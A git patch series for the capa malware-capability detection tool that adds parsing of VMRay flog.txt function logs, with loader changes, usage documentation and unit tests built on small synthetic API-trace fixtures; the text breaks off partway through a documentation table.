From 1a2c3c01fa488e7e096c0c4bb8aad372c8eb87ee Mon Sep 17 00:00:00 2001 From: devs6186 Date: Mon, 23 Feb 2026 03:00:01 +0530 Subject: [PATCH 1/7] vmray: support parsing flog.txt (Download Function Log) Adds a parser for the VMRay flog.txt format (the free "Download Function Log" available from VMRay Threat Feed -> Full Report). Users no longer need the full ZIP archive to run capa against VMRay output. - capa/features/extractors/vmray/flog_txt.py: new parser for flog.txt header validation, Process/Thread/Region block splitting, API trace line parsing, sys_ prefix stripping - VMRayAnalysis.from_flog_txt() and VMRayExtractor.from_flog_txt() for constructing the extractor from a standalone flog.txt - helpers.py: detect flog.txt by filename + header magic; update unsupported-format error message to mention flog.txt - loader.py: route flog.txt inputs through VMRayExtractor.from_flog_txt - tests/test_vmray_flog_txt.py: 5 unit tests covering parse, header rejection, sys_ stripping, analysis and extractor construction Fixes #2452 --- CHANGELOG.md | 1 + capa/features/extractors/vmray/__init__.py | 57 ++++- capa/features/extractors/vmray/extractor.py | 5 + capa/features/extractors/vmray/flog_txt.py | 238 ++++++++++++++++++++ capa/helpers.py | 13 +- capa/loader.py | 11 +- doc/usage.md | 10 + tests/test_vmray_flog_txt.py | 131 +++++++++++ 8 files changed, 461 insertions(+), 5 deletions(-) create mode 100644 capa/features/extractors/vmray/flog_txt.py create mode 100644 tests/test_vmray_flog_txt.py diff --git a/CHANGELOG.md b/CHANGELOG.md index 3169082671..ed88f6ef90 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,7 @@ ### New Features - ghidra: support PyGhidra @mike-hunhoff #2788 +- vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835 ### Breaking Changes diff --git a/capa/features/extractors/vmray/__init__.py 
b/capa/features/extractors/vmray/__init__.py index 0eaf0d4c22..a27b9ae1b6 100644 --- a/capa/features/extractors/vmray/__init__.py +++ b/capa/features/extractors/vmray/__init__.py @@ -20,13 +20,23 @@ from dataclasses import dataclass from capa.exceptions import UnsupportedFormatError -from capa.features.extractors.vmray.models import File, Flog, SummaryV2, StaticData, FunctionCall, xml_to_dict +from capa.features.extractors.vmray.models import ( + AnalysisMetadata, + File, + FileHashes, + Flog, + FunctionCall, + StaticData, + SummaryV2, + xml_to_dict, +) +from capa.features.extractors.vmray import flog_txt logger = logging.getLogger(__name__) DEFAULT_ARCHIVE_PASSWORD = b"infected" -SUPPORTED_FLOG_VERSIONS = ("2",) +SUPPORTED_FLOG_VERSIONS = ("1", "2") # "1" = flog.txt, "2" = flog.xml @dataclass @@ -132,6 +142,49 @@ def __init__(self, zipfile_path: Path): self._compute_monitor_threads() self._compute_monitor_process_calls() + @classmethod + def from_flog_txt(cls, flog_txt_path: Path) -> "VMRayAnalysis": + """ + Build VMRayAnalysis from a standalone flog.txt file (no ZIP). + Used when only the free "Download Function Log" from VMRay is available. + No submission file or static data; only API trace is available. 
+ """ + self = cls.__new__(cls) + self.zipfile = None + self.flog = flog_txt.parse_flog_txt_path(flog_txt_path) + if self.flog.analysis.log_version not in SUPPORTED_FLOG_VERSIONS: + raise UnsupportedFormatError( + "VMRay feature extractor does not support flog version %s" % self.flog.analysis.log_version + ) + self.sv2 = SummaryV2( + analysis_metadata=AnalysisMetadata( + sample_type="unknown", + submission_filename=flog_txt_path.name, + ), + ) + self.submission_type = "unknown" + self.submission_name = flog_txt_path.name + self.submission_meta = File( + hash_values=FileHashes(md5="0" * 32, sha1="0" * 40, sha256="0" * 64), + is_sample=True, + ref_static_data=None, + ) + self.submission_sha256 = None + self.submission_static = None + self.submission_bytes = b"" + self.submission_base_address = None + self.exports = {} + self.imports = {} + self.sections = {} + self.monitor_processes = {} + self.monitor_threads = {} + self.monitor_threads_by_monitor_process = defaultdict(list) + self.monitor_process_calls = defaultdict(lambda: defaultdict(list)) + self._compute_monitor_processes() + self._compute_monitor_threads() + self._compute_monitor_process_calls() + return self + def _find_sample_file(self): logger.debug("searching archive for submission") diff --git a/capa/features/extractors/vmray/extractor.py b/capa/features/extractors/vmray/extractor.py index 27eeed4819..021eb33dc7 100644 --- a/capa/features/extractors/vmray/extractor.py +++ b/capa/features/extractors/vmray/extractor.py @@ -150,3 +150,8 @@ def get_call_name(self, ph, th, ch) -> str: @classmethod def from_zipfile(cls, zipfile_path: Path): return cls(VMRayAnalysis(zipfile_path)) + + @classmethod + def from_flog_txt(cls, flog_txt_path: Path): + """Build extractor from a standalone VMRay flog.txt (no ZIP). 
See #2452.""" + return cls(VMRayAnalysis.from_flog_txt(flog_txt_path)) diff --git a/capa/features/extractors/vmray/flog_txt.py b/capa/features/extractors/vmray/flog_txt.py new file mode 100644 index 0000000000..8f00d3168c --- /dev/null +++ b/capa/features/extractors/vmray/flog_txt.py @@ -0,0 +1,238 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Parser for VMRay Function Log text format (flog.txt). + +flog.txt is a free download from VMRay (Threat Feed -> Full Report -> Download Function Log). +Format: header lines starting with "#", then Process: blocks containing Region: and Thread: +blocks. 
Thread blocks contain API trace lines like: + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + +See: https://github.com/mandiant/capa/issues/2452 +""" + +import re +from pathlib import Path +from typing import Any, Optional + +from capa.exceptions import UnsupportedFormatError +from capa.features.extractors.vmray.models import ( + Analysis, + Flog, + FunctionCall, + MonitorProcess, + MonitorThread, +) + +FLOG_TXT_VERSION_HEADER = "# Flog Txt Version 1" + + +def _parse_hex_or_decimal(s: str) -> int: + s = s.strip().strip('"') + if s.startswith("0x") or s.startswith("0X"): + return int(s, 16) + return int(s, 10) + + +def _parse_properties(block: str) -> dict[str, Any]: + """Parse key = value lines from a Process/Thread/Region block.""" + result: dict[str, Any] = {} + for line in block.splitlines(): + line = line.strip() + if not line or " = " not in line: + continue + key, _, value = line.partition(" = ") + key = key.strip() + value = value.strip() + if key in ("os_pid", "os_parent_pid", "parent_id", "process_id", "thread_id", "os_tid", "id"): + result[key] = _parse_hex_or_decimal(value) + elif key in ("filename", "image_name", "cmd_line", "monitor_reason"): + result[key] = value.strip('"').replace("\\\\", "\\").strip() + else: + result[key] = value + return result + + +def _parse_event(line: str) -> Optional[tuple[str, str, Optional[int]]]: + """ + Parse one API trace line. Returns (api_name, args_str, return_value) or None. 
+ Examples: + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + [0083.567] CoTaskMemFree (pv=0x746aa0) + """ + line = line.strip() + if not line.startswith("["): + return None + # [timestamp] api_name (args) [returned rv] + match = re.match(r"\[\s*(\d+)\.(\d+)\]\s+(\S+)\s*\((.*)\)\s*(?:returned\s+(0x[0-9a-fA-F]+|\d+))?", line) + if not match: + return None + _major, _minor, api_name, args, rv = match.groups() + args = args.strip() if args else "" + return_value: Optional[int] = None + if rv: + return_value = _parse_hex_or_decimal(rv) + return (api_name, args, return_value) + + +def _parse_thread_block( + block: str, thread_props: dict[str, Any] +) -> Optional[tuple[MonitorThread, list[tuple[str, str, Optional[int]]]]]: + """Parse a Thread: block; return MonitorThread and collect events (caller adds them).""" + lines = block.splitlines() + events: list[tuple[str, str, Optional[int]]] = [] + for line in lines: + if line.strip().startswith("["): + ev = _parse_event(line) + if ev: + events.append(ev) + thread_id = thread_props.get("thread_id") or thread_props.get("id") + os_tid = thread_props.get("os_tid", 0) + process_id = thread_props.get("process_id", 0) + if thread_id is None: + return None + # We return the MonitorThread; events are converted to FunctionCalls by the caller + return MonitorThread( + ts=0, + thread_id=int(thread_id), + process_id=int(process_id), + os_tid=int(os_tid) if os_tid else 0, + ), events + + +def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[MonitorThread], list[FunctionCall]]]: + """ + Parse a Process: block. Returns (MonitorProcess, list of MonitorThread, list of FunctionCall) or None. 
+ """ + # Split by Thread: on its own line (allow optional whitespace) + parts = re.split(r"\n\s*Thread:\s*\n", block) + if len(parts) < 2: + return None # no Thread: block found + header_and_regions = parts[0] + thread_blocks = [p.strip() for p in parts[1:] if p.strip()] + + # First part: Process properties then Region: blocks + process_props = _parse_properties(header_and_regions.split("\nRegion:\n")[0]) + process_id = process_props.get("id") or process_props.get("process_id") + if process_id is None: + return None + monitor_process = MonitorProcess( + ts=0, + process_id=int(process_id), + image_name=process_props.get("image_name", "").strip('"') or "unknown", + filename=process_props.get("filename", "").strip('"') or "", + os_pid=process_props.get("os_pid", 0) or 0, + monitor_reason=process_props.get("monitor_reason", "analysis_target").strip('"'), + parent_id=int(process_props.get("parent_id", 0) or 0), + os_parent_pid=int(process_props.get("os_parent_pid", 0) or 0), + cmd_line=process_props.get("cmd_line", "").strip('"') or "", + ) + + threads: list[MonitorThread] = [] + function_calls: list[FunctionCall] = [] + fncall_id = 0 + for thread_block in thread_blocks: + thread_props = _parse_properties(thread_block) + thread_props["process_id"] = process_id + parsed = _parse_thread_block(thread_block, thread_props) + if parsed is None: + continue + mon_thread, events = parsed + threads.append(mon_thread) + for api_name, args_str, rv in events: + fncall_id += 1 + # Strip sys_ prefix for Linux kernel calls (match XML behavior) + if api_name.startswith("sys_"): + api_name = api_name[4:] + function_calls.append( + FunctionCall( + fncall_id=fncall_id, + process_id=mon_thread.process_id, + thread_id=mon_thread.thread_id, + name=api_name, + params_in=None, # flog.txt args could be parsed later into Param list + params_out=None, + ) + ) + + return (monitor_process, threads, function_calls) + + +def parse_flog_txt(content: str) -> Flog: + """ + Parse flog.txt content into 
the same Flog (Analysis) model used by the XML path. + """ + # Skip BOM if present; normalize line endings so splits on "Process:\n" / "Thread:\n" work + if content.startswith("\ufeff"): + content = content[1:] + content = content.replace("\r\n", "\n").replace("\r", "\n") + lines = content.splitlines() + # Find end of header (first non-# line) + header_end: Optional[int] = None + for i, line in enumerate(lines): + if line.strip() and not line.strip().startswith("#"): + header_end = i + break + if header_end is None: + header_end = len(lines) + header = "\n".join(lines[:header_end]) + if FLOG_TXT_VERSION_HEADER not in header: + raise UnsupportedFormatError( + "File does not appear to be a VMRay flog.txt (missing '%s')" % FLOG_TXT_VERSION_HEADER + ) + body = "\n".join(lines[header_end:]).strip() + + # Split by "Process:" on its own line (allow optional whitespace) + process_blocks = re.split(r"\n\s*Process:\s*\n", body) + process_blocks = [b.strip() for b in process_blocks if b.strip()] + # If body started with "Process:\n", first element is the only block and starts with "Process:\n" + if not process_blocks and body.strip(): + # No split happened (e.g. 
body is "Process:\nid=..."), treat whole body as one process block + process_blocks = [body.strip()] + monitor_processes: list[MonitorProcess] = [] + monitor_threads: list[MonitorThread] = [] + function_calls: list[FunctionCall] = [] + + for block in process_blocks: + # First block may start with "Process:\n" when body began with that line + if block.lstrip().startswith("Process:"): + block = block.split("\n", 1)[-1].strip() if "\n" in block else "" + if not block: + continue + result = _parse_process_block(block) + if result is None: + continue # skip malformed process block + mon_process, threads, calls = result + monitor_processes.append(mon_process) + monitor_threads.extend(threads) + function_calls.extend(calls) + + # Use alias names so Pydantic accepts the lists (Analysis model uses alias= for XML compat) + analysis = Analysis( + log_version="1", + analyzer_version="flog.txt", + monitor_process=monitor_processes, + monitor_thread=monitor_threads, + fncall=function_calls, + ) + return Flog(analysis=analysis) + + +def parse_flog_txt_path(path: Path) -> Flog: + """Parse a flog.txt file from disk.""" + text = path.read_text(encoding="utf-8", errors="replace") + return parse_flog_txt(text) diff --git a/capa/helpers.py b/capa/helpers.py index 27c757dcc6..ddda8acb54 100644 --- a/capa/helpers.py +++ b/capa/helpers.py @@ -231,6 +231,14 @@ def get_format_from_extension(sample: Path) -> str: format_ = FORMAT_SC32 elif sample.name.endswith(EXTENSIONS_SHELLCODE_64): format_ = FORMAT_SC64 + elif sample.name.endswith("flog.txt"): + # VMRay free "Download Function Log" format (#2452) + try: + header = sample.read_bytes()[:512].decode("utf-8", errors="replace") + if "# Flog Txt Version 1" in header: + format_ = FORMAT_VMRAY + except (OSError, UnicodeDecodeError): + pass elif sample.name.endswith(EXTENSIONS_DYNAMIC): format_ = get_format_from_report(sample) elif sample.name.endswith(EXTENSIONS_FREEZE): @@ -307,9 +315,10 @@ def log_unsupported_vmray_report_error(error: str): 
logger.error(" Input file is not a valid VMRay analysis archive: %s", error) logger.error(" ") logger.error( - " capa only supports analyzing VMRay dynamic analysis archives containing summary_v2.json and flog.xml log files." + " capa supports analyzing VMRay dynamic analysis archives (containing summary_v2.json and flog.xml)" ) - logger.error(" Please make sure you have downloaded a dynamic analysis archive from VMRay.") + logger.error(" or a standalone VMRay function log (flog.txt, via Threat Feed -> Full Report -> Download Function Log).") + logger.error(" Please make sure you have downloaded a supported VMRay report.") logger.error("-" * 80) diff --git a/capa/loader.py b/capa/loader.py index d89d4c09fb..88a159af35 100644 --- a/capa/loader.py +++ b/capa/loader.py @@ -236,6 +236,8 @@ def get_extractor( elif backend == BACKEND_VMRAY: import capa.features.extractors.vmray.extractor + if input_path.name.endswith("flog.txt"): + return capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_path) return capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_path) elif backend == BACKEND_DOTNET: @@ -491,7 +493,14 @@ def get_file_extractors(input_file: Path, input_format: str) -> list[FeatureExtr elif input_format == FORMAT_VMRAY: import capa.features.extractors.vmray.extractor - file_extractors.append(capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file)) + if input_file.name.endswith("flog.txt"): + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_file) + ) + else: + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file) + ) elif input_format == FORMAT_BINEXPORT2: file_extractors = _get_binexport2_file_extractors(input_file) diff --git a/doc/usage.md b/doc/usage.md index 6a207ed6f6..fc5f9dcf6d 100644 --- a/doc/usage.md +++ b/doc/usage.md @@ -2,6 +2,16 @@ See `capa -h` for all supported arguments and 
usage examples. +## Ways to consume capa output + +| Option | Description | Typical use | +|--------|-------------|-------------| +| **CLI** | `capa` on the command line | Scripting, CI/CD, one-off analysis | +| [**IDA Pro**](https://github.com/mandiant/capa/tree/master/capa/ida/plugin) | capa Explorer plugin inside IDA | Interactive analysis with jump-to-address | +| [**Ghidra**](https://github.com/mandiant/capa/tree/master/capa/ghidra/plugin) | capa Explorer plugin inside Ghidra | Interactive analysis with Ghidra integration | +| [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output | +| [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar | + ## Default vs verbose output By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched. diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py new file mode 100644 index 0000000000..838a204bf8 --- /dev/null +++ b/tests/test_vmray_flog_txt.py @@ -0,0 +1,131 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Tests for VMRay flog.txt parser (#2452).""" + +import pytest + +from capa.exceptions import UnsupportedFormatError +from capa.features.extractors.vmray import flog_txt +from capa.features.extractors.vmray.extractor import VMRayExtractor + + +MINIMAL_FLOG_TXT = """ +# Log Creation Date: 08.10.2024 18:12:03 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x118c" +os_parent_pid = "0x7d8" +parent_id = "0" +image_name = "svchost.exe" +filename = "c:\\\\users\\\\test\\\\desktop\\\\svchost.exe" +cmd_line = "\\"c:\\\\users\\\\test\\\\desktop\\\\svchost.exe\\" " +monitor_reason = "analysis_target" + +Region: +id = "125" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x117c" + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + [0066.433] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 +""" + + +def test_parse_flog_txt_minimal(tmp_path): + # Write as binary so newlines are exactly \n (avoids Windows \r\n) + path = tmp_path / "flog.txt" + path.write_bytes( + b'# Flog Txt Version 1\n\n' + b'Process:\n' + b'id = "1"\n' + b'os_pid = "0x118c"\n' + b'image_name = "svchost.exe"\n' + b'filename = "test.exe"\n' + b'monitor_reason = "analysis_target"\n' + b'parent_id = "0"\n' + b'os_parent_pid = "0"\n' + b'cmd_line = ""\n\n' + b'Thread:\n' + b'id = "1"\n' + b'os_tid = "0x117c"\n' + b' [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n' + ) + flog = flog_txt.parse_flog_txt_path(path) + assert 
flog.analysis.log_version == "1" + assert len(flog.analysis.monitor_processes) == 1 + proc = flog.analysis.monitor_processes[0] + assert proc.image_name == "svchost.exe" + assert proc.process_id == 1 + assert proc.os_pid == 0x118C + assert len(flog.analysis.monitor_threads) == 1 + thread = flog.analysis.monitor_threads[0] + assert thread.thread_id == 1 + assert thread.process_id == 1 + assert len(flog.analysis.function_calls) == 1 + assert flog.analysis.function_calls[0].name == "GetCurrentProcess" + + +def test_parse_flog_txt_rejects_wrong_header(): + with pytest.raises(UnsupportedFormatError, match="does not appear to be a VMRay flog.txt"): + flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n") + + +def test_parse_flog_txt_sys_prefix_stripped(tmp_path): + # Linux kernel calls start with sys_; parser should strip for consistency with XML + path = tmp_path / "flog.txt" + path.write_bytes( + b'# Flog Txt Version 1\n\n' + b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample"\nfilename = "x"\ncmd_line = ""\nmonitor_reason = "a"\n\n' + b'Thread:\nid = "1"\nos_tid = "0x2000"\n [0001.000] sys_time () returned 0x0\n' + ) + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.function_calls) == 1 + assert flog.analysis.function_calls[0].name == "time" + + +def test_vmray_analysis_from_flog_txt(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) + from capa.features.extractors.vmray import VMRayAnalysis + + analysis = VMRayAnalysis.from_flog_txt(path) + assert analysis.submission_name == "flog.txt" + assert analysis.submission_type == "unknown" + assert analysis.submission_meta is not None + assert analysis.submission_static is None + assert len(analysis.monitor_processes) == 1 + assert len(analysis.monitor_process_calls) >= 1 + + +def test_vmray_extractor_from_flog_txt(tmp_path): + from capa.features.address 
import NO_ADDRESS + + path = tmp_path / "flog.txt" + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) + ext = VMRayExtractor.from_flog_txt(path) + assert ext.get_base_address() is NO_ADDRESS # no base address from flog.txt + procs = list(ext.get_processes()) + assert len(procs) == 1 + threads = list(ext.get_threads(procs[0])) + assert len(threads) == 1 + calls = list(ext.get_calls(procs[0], threads[0])) + assert len(calls) == 3 From b92472137aff0b9d48f807ea96ffdfc2e4697c3d Mon Sep 17 00:00:00 2001 From: devs6186 Date: Mon, 23 Feb 2026 03:53:44 +0530 Subject: [PATCH 2/7] vmray: address code review feedback for flog.txt parser - Handle empty strings in _parse_hex_or_decimal (return 0 instead of crash) - Use regex for Region: block splitting (consistent with Process:/Thread:) - Parse API call arguments into Param objects so String/Number features are extracted (string args use void_ptr+str deref to match XML convention) - Use FunctionCall.model_validate instead of __init__ to work around Pydantic alias "in" clashing with Python keyword - Add test_parse_flog_txt_args_parsed covering string, numeric, and no-arg API calls --- capa/features/extractors/vmray/flog_txt.py | 66 ++++++++++++++++++---- tests/test_vmray_flog_txt.py | 39 +++++++++++++ 2 files changed, 95 insertions(+), 10 deletions(-) diff --git a/capa/features/extractors/vmray/flog_txt.py b/capa/features/extractors/vmray/flog_txt.py index 8f00d3168c..fd341b9587 100644 --- a/capa/features/extractors/vmray/flog_txt.py +++ b/capa/features/extractors/vmray/flog_txt.py @@ -35,14 +35,22 @@ FunctionCall, MonitorProcess, MonitorThread, + Param, + Params, ) FLOG_TXT_VERSION_HEADER = "# Flog Txt Version 1" +# Matches name=value argument pairs inside an API call's parentheses. +# value may be: "quoted string" (including escaped chars), 0xHEX, decimal, or other token. 
+_PARAM_RE = re.compile(r'(\w+)=((?:"(?:[^"\\]|\\.)*")|(?:0x[0-9a-fA-F]+)|(?:\d+)|(?:[^,\s]+))') + def _parse_hex_or_decimal(s: str) -> int: s = s.strip().strip('"') - if s.startswith("0x") or s.startswith("0X"): + if not s: + return 0 + if s.lower().startswith("0x"): return int(s, 16) return int(s, 10) @@ -66,6 +74,40 @@ def _parse_properties(block: str) -> dict[str, Any]: return result +def _parse_args(args_str: str) -> Optional[Params]: + """ + Parse an API call's argument string into a Params object. + + Handles: name="quoted string", name=0xHEX, name=DECIMAL. + String values are modelled as void_ptr + str deref to match the XML extractor convention + so that String features are correctly yielded by the call feature extractor. + Numeric values use type unsigned_32bit so that Number features are yielded. + Symbolic constants (e.g. NULL, TRUE) are skipped; their numeric values are unknown without + header definitions. + + Returns None if no parseable arguments are present. + """ + if not args_str.strip(): + return None + params: list[Param] = [] + for m in _PARAM_RE.finditer(args_str): + name = m.group(1) + raw = m.group(2) + if raw.startswith('"'): + # String value — model as void_ptr with str deref (matches XML extractor convention) + str_val = raw[1:-1] + params.append( + Param.model_validate({"name": name, "type": "void_ptr", "deref": {"type": "str", "value": str_val}}) + ) + elif re.match(r"^0x[0-9a-fA-F]+$", raw) or raw.isdigit(): + # Numeric value — model as integer so Number features are yielded + params.append(Param.model_validate({"name": name, "type": "unsigned_32bit", "value": raw})) + # else: symbolic constant (NULL, INVALID_HANDLE_VALUE, etc.) — skip; value not recoverable + if not params: + return None + return Params.model_validate({"param": params}) + + def _parse_event(line: str) -> Optional[tuple[str, str, Optional[int]]]: """ Parse one API trace line. Returns (api_name, args_str, return_value) or None. 
@@ -125,8 +167,8 @@ def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[Moni header_and_regions = parts[0] thread_blocks = [p.strip() for p in parts[1:] if p.strip()] - # First part: Process properties then Region: blocks - process_props = _parse_properties(header_and_regions.split("\nRegion:\n")[0]) + # First part: Process properties then Region: blocks (use regex for robustness) + process_props = _parse_properties(re.split(r"\n\s*Region:\s*\n", header_and_regions)[0]) process_id = process_props.get("id") or process_props.get("process_id") if process_id is None: return None @@ -158,14 +200,18 @@ def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[Moni # Strip sys_ prefix for Linux kernel calls (match XML behavior) if api_name.startswith("sys_"): api_name = api_name[4:] + # use model_validate because FunctionCall's "in" alias clashes with a Python keyword; + # passing params_in= via __init__ is silently dropped by Pydantic function_calls.append( - FunctionCall( - fncall_id=fncall_id, - process_id=mon_thread.process_id, - thread_id=mon_thread.thread_id, - name=api_name, - params_in=None, # flog.txt args could be parsed later into Param list - params_out=None, + FunctionCall.model_validate( + { + "fncall_id": fncall_id, + "process_id": mon_thread.process_id, + "thread_id": mon_thread.thread_id, + "name": api_name, + "in": _parse_args(args_str), + "out": None, + } ) ) diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py index 838a204bf8..95088ea134 100644 --- a/tests/test_vmray_flog_txt.py +++ b/tests/test_vmray_flog_txt.py @@ -129,3 +129,42 @@ def test_vmray_extractor_from_flog_txt(tmp_path): assert len(threads) == 1 calls = list(ext.get_calls(procs[0], threads[0])) assert len(calls) == 3 + + +def test_parse_flog_txt_args_parsed(tmp_path): + """API call arguments are parsed into Param objects for feature extraction.""" + path = tmp_path / "flog.txt" + path.write_bytes( + b'# Flog Txt Version 1\n\n' + 
b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample"\nfilename = "x.exe"\ncmd_line = ""\nmonitor_reason = "a"\n\n' + b'Thread:\nid = "1"\nos_tid = "0x2000"\n' + b' [0001.000] CreateFile (lpFileName="test.exe", dwDesiredAccess=0x80000000) returned 0x4\n' + b' [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n' + b' [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n' + ) + flog = flog_txt.parse_flog_txt_path(path) + calls = flog.analysis.function_calls + + # CreateFile: string param and numeric param + create_file = calls[0] + assert create_file.name == "CreateFile" + assert create_file.params_in is not None + params = {p.name: p for p in create_file.params_in.params} + assert "lpFileName" in params + assert params["lpFileName"].deref is not None + assert params["lpFileName"].deref.value == "test.exe" + assert "dwDesiredAccess" in params + assert params["dwDesiredAccess"].value == "0x80000000" + + # VirtualAlloc: two numeric params + virtual_alloc = calls[1] + assert virtual_alloc.params_in is not None + va_params = {p.name: p for p in virtual_alloc.params_in.params} + assert va_params["lpAddress"].value == "0x0" + assert va_params["dwSize"].value == "4096" + + # no-arg call: params_in should be None + get_proc = calls[2] + assert get_proc.name == "GetCurrentProcess" + assert get_proc.params_in is None From 548d814515e1744740043a22f261cb7b85d6ce2c Mon Sep 17 00:00:00 2001 From: devs6186 Date: Mon, 23 Feb 2026 16:24:19 +0530 Subject: [PATCH 3/7] vmray: add docs, fetch helper, and fixture-based regression tests for flog.txt MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Addresses reviewer feedback on #2878: 1. Document flog.txt vs full archive trade-offs in doc/usage.md with a comparison table (available features, how to obtain, file size). 2. 
Add scripts/fetch-vmray-flog.py — given a VMRay instance URL, API key, and sample SHA-256, downloads flog.txt via the REST API and optionally runs capa against it. 3. Add fixture-based regression tests (tests/fixtures/vmray/flog_txt/) with three representative flog.txt files: - windows_apis.flog.txt: Win32 APIs, string args with backslash paths, numeric args, multi-process - linux_syscalls.flog.txt: Linux sys_-prefixed calls (all stripped) - string_edge_cases.flog.txt: paths with spaces, UNC paths, URLs, empty strings tests/test_vmray_flog_txt.py gains 14 new feature-presence tests covering API, String, and Number extraction at the call scope, plus negative checks (double-backslash must not appear; sys_ prefix must not appear). Fixes #2878 --- CHANGELOG.md | 1 + doc/usage.md | 30 ++ scripts/fetch-vmray-flog.py | 270 +++++++++++++++++ .../vmray/flog_txt/linux_syscalls.flog.txt | 43 +++ .../vmray/flog_txt/string_edge_cases.flog.txt | 37 +++ .../vmray/flog_txt/windows_apis.flog.txt | 63 ++++ tests/test_vmray_flog_txt.py | 276 +++++++++++++++++- 7 files changed, 709 insertions(+), 11 deletions(-) create mode 100644 scripts/fetch-vmray-flog.py create mode 100644 tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt create mode 100644 tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt create mode 100644 tests/fixtures/vmray/flog_txt/windows_apis.flog.txt diff --git a/CHANGELOG.md b/CHANGELOG.md index ed88f6ef90..636f864436 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,6 +6,7 @@ - ghidra: support PyGhidra @mike-hunhoff #2788 - vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452 +- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835 ### Breaking Changes diff --git a/doc/usage.md b/doc/usage.md index fc5f9dcf6d..d3ccfa8fd9 100644 --- a/doc/usage.md +++ b/doc/usage.md @@ 
-16,6 +16,36 @@ See `capa -h` for all supported arguments and usage examples. By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched. +## VMRay: flog.txt vs full analysis archive + +When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file. +Choose based on what you have access to and what features you need. + +| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** | +|-|-|-| +| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* | +| **File size** | Small text file | Large encrypted ZIP | +| **Dynamic API calls** | ✓ | ✓ | +| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Static imports / exports** | ✗ | ✓ | +| **PE/ELF section 